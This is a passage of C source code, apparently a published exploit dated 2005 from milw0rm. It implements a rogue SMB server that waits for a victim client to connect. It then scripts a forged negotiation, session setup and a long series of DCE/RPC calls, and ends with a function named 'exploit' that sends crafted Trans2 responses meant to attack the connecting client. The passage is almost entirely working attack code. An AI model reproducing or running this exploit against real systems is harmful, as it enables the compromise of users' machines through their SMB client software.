554 else if ( wrg == 16 )
555 return ( 3 );
556 else
557 {
558 printf ( "there is/are %d invalid byte(s) in the interface UUID!\n", foo );
559 return ( -1 );
560 }
561}
562
563void
564neg ( int s )
565{
566 char response[1024];
567
568 bzero ( &response, sizeof ( response ) );
569 recv ( s, response, sizeof ( response ) -1, 0 );
570
571 send ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );
572}
573
574void
575sessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )
576{
577 char response[1024];
578 unsigned char ntlm_challenge1[] = "\xa2\x75\x1b\x10\xe7\x62\xb0\xc3";
579 unsigned char ntlm_challenge2[] = "\xe1\xed\x43\x66\xc7\xa7\x36\xbd";
580
581 bzero ( &response, sizeof ( response ) );
582 recv ( s, response, sizeof ( response ) -1, 0 );
583
584 printf ( "SessionSetupAndXNeg\n" );
585 SessionSetupAndXNeg[30] = response[30];
586 SessionSetupAndXNeg[31] = response[31];
587 SessionSetupAndXNeg[34] = response[34];
588 SessionSetupAndXNeg[35] = response[35];
589
590 strncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );
591 if ( option == 0 )
592 memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );
593 else
594 memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );
595
596 send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );
597
598 bzero ( &response, sizeof ( response ) );
599 recv ( s, response, sizeof ( response ) -1, 0 );
600
601 printf ( "SessionSetupAndXAuth\n" );
602 SessionSetupAndXAuth[30] = response[30];
603 SessionSetupAndXAuth[31] = response[31];
604 SessionSetupAndXAuth[34] = response[34];
605 SessionSetupAndXAuth[35] = response[35];
606
607 strncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );
608
609 send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );
610
611 bzero ( &response, sizeof ( response ) );
612 recv ( s, response, sizeof ( response ) -1, 0 );
613
614 printf ( "TreeConnectAndX\n" );
615 TreeConnectAndX[30] = response[30];
616 TreeConnectAndX[31] = response[31];
617 TreeConnectAndX[34] = response[34];
618 TreeConnectAndX[35] = response[35];
619
620 strncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );
621 strncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );
622
623 send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );
624}
625
626void
627digg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )
628{
629 int ret;
630 char response[1024];
631 unsigned char srv[] = "\x73\x72\x76";
632 unsigned char wks[] = "\x77\x6b\x73";
633
634 bzero ( &response, sizeof ( response ) );
635 recv ( s, response, sizeof ( response ) -1, 0 );
636
637 printf ( "SmbNtCreate\n" );
638 SmbNtCreate[30] = response[30];
639 SmbNtCreate[31] = response[31];
640 SmbNtCreate[34] = response[34];
641 SmbNtCreate[35] = response[35];
642
643 strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );
644 strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );
645 strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );
646
647 send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );
648
649 bzero ( &response, sizeof ( response ) );
650 recv ( s, response, sizeof ( response ) -1, 0 );
651
652 printf ( "DceRpc\n" );
653 DceRpc[30] = response[30];
654 DceRpc[31] = response[31];
655 DceRpc[34] = response[34];
656 DceRpc[35] = response[35];
657
658 strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );
659 strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );
660 strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );
661
662 ret = check_interface ( response );
663 if ( ret == 0 )
664 memcpy ( DceRpc + 92, wks, 3 );
665 else if ( ret == 1 )
666 memcpy ( DceRpc + 92, srv, 3 );
667 else if ( ret == 2 );
668 else if ( ret == 3 );
669 else
670 {
671 printf ( "invalid interface uuid, aborting...\n" );
672 exit ( 1 );
673 }
674
675 send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );
676
677 bzero ( &response, sizeof ( response ) );
678 recv ( s, response, sizeof ( response ) -1, 0 );
679
680 if ( option == 1 )
681 {
682 printf ( "NetrShareEnum\n" );
683 NetrShareEnum[30] = response[30];
684 NetrShareEnum[31] = response[31];
685 NetrShareEnum[34] = response[34];
686 NetrShareEnum[35] = response[35];
687
688 strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );
689 strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );
690
691 send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );
692 }
693 else if ( ( option == 2 ) && ( ret == 2 ) )
694 {
695 printf ( "OpenPrinterEx\n" );
696 OpenPrinterEx[30] = response[30];
697 OpenPrinterEx[31] = response[31];
698 OpenPrinterEx[34] = response[34];
699 OpenPrinterEx[35] = response[35];
700
701 strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );
702 strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );
703
704 send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );
705
706 bzero ( &response, sizeof ( response ) );
707 recv ( s, response, sizeof ( response ) -1, 0 );
708
709 printf ( "ClosePrinter\n" );
710 ClosePrinter[30] = response[30];
711 ClosePrinter[31] = response[31];
712 ClosePrinter[34] = response[34];
713 ClosePrinter[35] = response[35];
714
715 strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );
716 strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );
717
718 send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );
719 }
720 else if ( ( option == 3 ) && ( ret == 3 ) )
721 {
722 printf ( "OpenHklm\n" );
723 OpenHklm[30] = response[30];
724 OpenHklm[31] = response[31];
725 OpenHklm[34] = response[34];
726 OpenHklm[35] = response[35];
727
728 strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );
729 strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );
730
731 send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );
732
733 bzero ( &response, sizeof ( response ) );
734 recv ( s, response, sizeof ( response ) -1, 0 );
735
736 printf ( "OpenKey\n" );
737 OpenKey[30] = response[30];
738 OpenKey[31] = response[31];
739 OpenKey[34] = response[34];
740 OpenKey[35] = response[35];
741
742 strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );
743 strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );
744
745 send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );
746
747 bzero ( &response, sizeof ( response ) );
748 recv ( s, response, sizeof ( response ) -1, 0 );
749
750 printf ( "CloseKey\n" );
751 CloseKey[30] = response[30];
752 CloseKey[31] = response[31];
753 CloseKey[34] = response[34];
754 CloseKey[35] = response[35];
755
756 strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );
757 strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );
758
759 send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );
760 }
761 else if ( option == 4 )
762 {
763 printf ( "NetBios1\n" );
764 NetBios1[30] = response[30];
765 NetBios1[31] = response[31];
766 NetBios1[34] = response[34];
767 NetBios1[35] = response[35];
768
769 strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );
770 strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );
771
772 send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );
773 }
774 else
775 {
776 if ( ret == 0 )
777 {
778 printf ( "WksSvc\n" );
779 WksSvc[30] = response[30];
780 WksSvc[31] = response[31];
781 WksSvc[34] = response[34];
782 WksSvc[35] = response[35];
783
784 strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );
785 strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );
786
787 send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );
788 }
789 else
790 {
791 printf ( "SrvSvc\n" );
792 SrvSvc[30] = response[30];
793 SrvSvc[31] = response[31];
794 SrvSvc[34] = response[34];
795 SrvSvc[35] = response[35];
796
797 strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );
798 strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );
799
800 send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );
801 }
802 }
803
804 bzero ( &response, sizeof ( response ) );
805 recv ( s, response, sizeof ( response ) -1, 0 );
806
807 printf ( "SmbClose\n" );
808 SmbClose[30] = response[30];
809 SmbClose[31] = response[31];
810 SmbClose[34] = response[34];
811 SmbClose[35] = response[35];
812
813 strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );
814 strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );
815
816 send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );
817}
818
819void
820exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )
821{
822 char response[1024];
823
824 bzero ( &response, sizeof ( response ) );
825 recv ( s, response, sizeof ( response ) -1, 0 );
826
827 printf ( "NetBios2\n" );
828 NetBios2[30] = response[30];
829 NetBios2[31] = response[31];
830 NetBios2[34] = response[34];
831 NetBios2[35] = response[35];
832
833 strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );
834 strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );
835
836 send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );
837
838 bzero ( &response, sizeof ( response ) );
839 recv ( s, response, sizeof ( response ) -1, 0 );
840
841 printf ( "Trans2Response1\n" );
842 Trans2Response1[30] = response[30];
843 Trans2Response1[31] = response[31];
844 Trans2Response1[34] = response[34];
845 Trans2Response1[35] = response[35];
846
847 strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );
848 strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );
849
850 send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );
851
852 bzero ( &response, sizeof ( response ) );
853 recv ( s, response, sizeof ( response ) -1, 0 );
854
855 printf ( "Trans2Response2\n" );
856 Trans2Response2[30] = response[30];
857 Trans2Response2[31] = response[31];
858 Trans2Response2[34] = response[34];
859 Trans2Response2[35] = response[35];
860
861 strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );
862 strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );
863
864 send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );
865
866 bzero ( &response, sizeof ( response ) );
867 recv ( s, response, sizeof ( response ) -1, 0 );
868
869 printf ( "Trans2Response3\n" );
870 Trans2Response3[30] = response[30];
871 Trans2Response3[31] = response[31];
872 Trans2Response3[34] = response[34];
873 Trans2Response3[35] = response[35];
874
875 strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );
876 strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );
877
878 send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );
879}
880
881int
882main ( int argc, char* argv[] )
883{
884 int s1, s2, i;
885 unsigned long fid = 0x1337;
886 unsigned long treeid = 0x0808;
887 unsigned long userid = 0x0808;
888 unsigned long assocgroup = 0x4756;
889 pid_t childpid;
890 socklen_t clilen;
891 struct sockaddr_in cliaddr, servaddr;
892
893 bzero ( &servaddr, sizeof ( servaddr ) );
894 servaddr.sin_family = AF_INET;
895 servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
896 servaddr.sin_port = htons ( PORT );
897
898 s1 = socket ( AF_INET, SOCK_STREAM, 0 );
899 bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
900 listen ( s1, 1 );
901
902 clilen = sizeof ( cliaddr );
903
904 s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );
905
906 close ( s1 );
907
908 printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );
909
910 neg ( s2 ); // Negotiate
911 sessionsetup ( s2, userid, treeid, 0 ); // SessionSetup
912 for ( i = 0; i < 15; i++ )
913 {
914 digg ( s2, fid, assocgroup, userid, treeid, 0 );
915 fid++;
916 assocgroup ++;
917 }
918 digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum
919 fid++;
920 assocgroup ++;
921 digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss
922 fid++;
923 assocgroup ++;
924 for ( i = 0; i < 4; i++ )
925 {
926 digg ( s2, fid, assocgroup, userid, treeid, 0 );
927 fid++;
928 assocgroup ++;
929 }
930 digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg
931 userid++;
932 treeid++;
933 sessionsetup ( s2, userid, treeid, 1 ); // SessionSetup
934 userid--;
935 treeid--;
936 for ( i = 0; i < 2; i++ )
937 {
938 digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios
939 fid++;
940 assocgroup ++;
941 }
942 treeid += 2;
943 exploit ( s2, fid, assocgroup, userid, treeid );
944
945 printf ( "done!\n" );
946
947 close ( s2 );
948}
949
950// milw0rm.com [2005-06-23]